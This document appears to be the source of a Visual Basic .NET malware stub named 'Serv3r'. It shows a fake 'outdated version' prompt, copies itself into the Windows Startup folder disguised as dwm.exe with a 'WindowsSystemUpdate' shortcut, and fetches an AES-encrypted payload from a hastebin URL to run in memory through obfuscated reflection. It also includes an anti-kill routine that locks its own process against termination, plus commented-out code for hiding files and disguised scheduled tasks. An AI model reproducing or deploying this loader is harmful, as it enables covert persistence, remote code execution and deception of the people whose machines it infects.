Serv3r

Imports System.IO
Imports System.Security.Cryptography
Imports System.Text
Imports System.Net
Imports System.ComponentModel
Imports System.Security.AccessControl
Imports System.Runtime.InteropServices
Imports System.Security.Principal
'### Cod3d by skype > el30n4d0
Public Class Form1
    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        Dim path As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
        Dim path2 As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\dwm.exe"
        If IO.File.Exists(path2) = True Then

        Else : MsgBox("The version of your software is outdated. Please download the new version", MsgBoxStyle.Information, "Outdated Version")
            Dim aFile As String = Application.ExecutablePath
            Dim Split() As String = aFile.Split("/")
            Dim Filename As String = "dwm.exe"
            System.IO.File.Copy(aFile, path & "/" & Filename)
        End If
        CreateShortCut(Application.ExecutablePath, path, "WindowsSystemUpdate")


        '#####################################
        'Shell("schtasks /Create /SC minute /MO 5 /TN AdobeUpdater /TR " & Application.ExecutablePath, AppWinStyle.Hide)

        '  IO.File.SetAttributes(Application.ExecutablePath, IO.FileAttributes.Hidden + IO.FileAttributes.System)
        '   Dim c_NewAntiKill As New c_AntiKill
        '  c_NewAntiKill.c_ImAntiKill()
        ' qweppaksdkpqwkpdpkasdqwdasd()
        '###############################3
    End Sub
    Private Function CreateShortCut(ByVal TargetName As String, ByVal ShortCutPath As String, ByVal ShortCutName As String) As Boolean
        Dim oShell As Object
        Dim oLink As Object
        'you don’t need to import anything in the project reference to create the Shell Object

        Try

            oShell = CreateObject("WScript.Shell")
            oLink = oShell.CreateShortcut(ShortCutPath & "\" & ShortCutName & ".lnk")
            '  oShell.iconLocation = "%SystemRoot%\system32\SheLL32.dll,8"
            oLink.iconLocation = "%SystemRoot%\system32\SheLL32.dll,12"
            oLink.TargetPath = TargetName
            oLink.WindowStyle = 1
            oLink.Save()
        Catch ex As Exception

        End Try

    End Function
    'Private Sub LNKSTART(ByVal PSH As String)
    '    Dim CWS As Object = CreateObject("WScript.Shell")
    '    Dim SSH, SF
    '    SF = CWS.SpecialFolders("Startup")
    '    SSH = CWS.CreateShortcut(SF & "\" & PSH & ".lnk")
    '    SSH.TargetPath = CWS.ExpandEnvironmentStrings(PSH)
    '    SSH.WindowStyle = 4
    '    SSH.IconLocation = "%SystemRoot%\system32\SheLL32.dll,8"
    '    SSH.Save()
    'End Sub
    Function qweppaksdkpqwkpdpkasdqwdasd()
        Dim Download As New WebClient()
        Dim strings As String = Download.DownloadString("https://hastebin.com/raw/aceloridux")
        Dim Base64 As Byte() = Convert.FromBase64String(AES(strings, "EAAAACEnFZ0wDsAgFz54T6xjtltmv4+T+egwCvXXqgN5VJ1L"))
        Dim Load As Object = Interaction.CallByName(AppDomain.CurrentDomain, AES("EAAAAKZ0Dv9XU5KCiha4Th4IEe3E/domsR49MblFHGLANgCI", "123212321232123212321232121"), CallType.Method, Base64)
        Dim EntryPoint As Object = Interaction.CallByName(Load, AES("EAAAACEnFZ0wDsAgFz54T6xjtltmv4+T+egwCvXXqgN5VJ1L", "123212321232123212321232121"), CallType.[Get])
        Dim invoke As Object = Interaction.CallByName(EntryPoint, AES("EAAAAGzRBSsnW2pXXjjnKn+GxH0X+MPJH/qqLIWaU3P8sHDL", "123212321232123212321232121"), CallType.Method, Nothing, Nothing)

    End Function
    Private Shared E0 As Byte() = Encoding.ASCII.GetBytes("o6806642kbM7c5")
    Public Shared Function AES(E00 As String, E000 As String) As String
        If String.IsNullOrEmpty(E00) Then
            Throw New ArgumentNullException("cipherText")
        End If
        If String.IsNullOrEmpty(E000) Then
            Throw New ArgumentNullException("sharedSecret")
        End If
        Dim E1 As RijndaelManaged = Nothing
        Dim E2 As String = Nothing
        Try
            Dim E22 As New Rfc2898DeriveBytes(E000, E0)
            Dim E11 As Byte() = Convert.FromBase64String(E00)
            Using msDecrypt As New MemoryStream(E11)
                E1 = New RijndaelManaged()
                E1.Key = E22.GetBytes(E1.KeySize / 8)
                E1.IV = E4(msDecrypt)
                Dim E3 As ICryptoTransform = E1.CreateDecryptor(E1.Key, E1.IV)
                Using E33 As New CryptoStream(msDecrypt, E3, CryptoStreamMode.Read)
                    Using E333 As New StreamReader(E33)
                        E2 = E333.ReadToEnd()
                    End Using
                End Using
            End Using
        Finally
            If E1 IsNot Nothing Then
                E1.Clear()
            End If
        End Try

        Return E2
    End Function
    Private Shared Function E4(E44 As Stream) As Byte()
        Dim E5 As Byte() = New Byte(4 - 1) {}
        If E44.Read(E5, 0, E5.Length) <> E5.Length Then
            Throw New SystemException("Stream did not contain properly formatted byte array")
        End If

        Dim E55 As Byte() = New Byte(BitConverter.ToInt32(E5, 0) - 1) {}
        If E44.Read(E55, 0, E55.Length) <> E55.Length Then
            Throw New SystemException("Did not read byte array properly")
        End If

        Return E55
    End Function
    Public Class c_AntiKill
        <DllImport("advapi32.dll", SetLastError:=True)> _
        Shared Function GetKernelObjectSecurity(Handle As IntPtr, securityInformation As Integer, <Out> pSecurityDescriptor As Byte(), nLength As UInteger, ByRef lpnLengthNeeded As UInteger) As Boolean
        End Function
        <DllImport("advapi32.dll", SetLastError:=True)> _
        Shared Function SetKernelObjectSecurity(Handle As IntPtr, securityInformation As Integer, <[In]> pSecurityDescriptor As Byte()) As Boolean
        End Function
        <DllImport("kernel32.dll")> _
        Shared Function GetCurrentProcess() As IntPtr
        End Function
        Protected Function GetProcessSecurityDescriptor(processHandle As IntPtr) As RawSecurityDescriptor
            Dim psd() As Byte = New Byte(1) {}
            Dim bufSizeNeeded As UInteger
            GetKernelObjectSecurity(processHandle, &H4, psd, 0, bufSizeNeeded)
            psd = New Byte(bufSizeNeeded) {}
            If bufSizeNeeded < 0 OrElse bufSizeNeeded > Short.MaxValue Then
                Throw New Win32Exception()
            End If
            If Not GetKernelObjectSecurity(processHandle, &H4, psd, bufSizeNeeded, bufSizeNeeded) Then
                Throw New Win32Exception()
            End If
            Return New RawSecurityDescriptor(psd, 0)
        End Function
        Protected Sub SetProcessSecurityDescriptor(processHandle As IntPtr, dacl As RawSecurityDescriptor)
            Dim rawsd As Byte() = New Byte(dacl.BinaryLength - 1) {}
            dacl.GetBinaryForm(rawsd, 0)
            If Not SetKernelObjectSecurity(processHandle, &H4, rawsd) Then
                Throw New Win32Exception()
            End If
        End Sub
        Public Sub c_ImAntiKill()
            Dim hProcess As IntPtr = GetCurrentProcess()
            Dim dacl = GetProcessSecurityDescriptor(hProcess)
            dacl.DiscretionaryAcl.InsertAce(0, New CommonAce(AceFlags.None, AceQualifier.AccessDenied, CInt(&HF0000 Or &H100000 Or &HFFF), New SecurityIdentifier(WellKnownSidType.WorldSid, Nothing), False, Nothing))
            SetProcessSecurityDescriptor(hProcess, dacl)
        End Sub
    End Class

    Private Sub Form1_FormClosing(sender As Object, e As FormClosingEventArgs) Handles MyBase.FormClosing
        '  Application.Restart()
    End Sub
End Class